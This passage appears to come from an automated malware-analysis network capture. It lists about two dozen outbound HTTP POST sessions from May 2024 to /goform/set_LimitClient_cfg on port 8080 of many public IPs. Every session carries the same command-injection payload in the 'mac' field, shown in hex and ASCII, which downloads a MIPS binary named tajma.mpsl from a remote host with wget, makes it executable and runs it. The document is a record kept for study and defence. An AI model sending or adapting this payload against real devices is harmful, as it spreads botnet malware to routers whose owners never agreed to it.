                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        537192.168.2.233772844.162.46.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306417942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        538192.168.2.2337744135.212.107.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.307543039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        539192.168.2.235970260.36.22.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.307678938 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        540192.168.2.2358996124.182.203.2058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.307679892 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        541192.168.2.2341638147.211.233.788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.307818890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        542192.168.2.234154243.88.177.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.307842970 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        543192.168.2.235968077.141.253.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.307872057 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        544192.168.2.2356214180.118.169.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308438063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        545192.168.2.235240877.28.137.128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308461905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        546192.168.2.2357640189.251.223.908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308695078 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        547192.168.2.233521494.223.221.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308763027 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        548192.168.2.2352312103.41.34.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308841944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        549192.168.2.235217251.175.97.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308875084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        550192.168.2.233412617.153.209.908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308970928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        551192.168.2.2346928154.197.25.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.308993101 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        552192.168.2.2335998198.204.106.1028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309027910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        553192.168.2.2336710137.231.226.1578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309067011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        554192.168.2.2356448166.37.64.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309083939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        555192.168.2.2359902133.137.0.2518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309119940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        556192.168.2.2356138140.90.137.1088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309137106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        557192.168.2.2334482139.105.191.1648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309155941 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        558192.168.2.234138648.234.55.898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.309187889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        559192.168.2.2333246162.165.222.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.361535072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
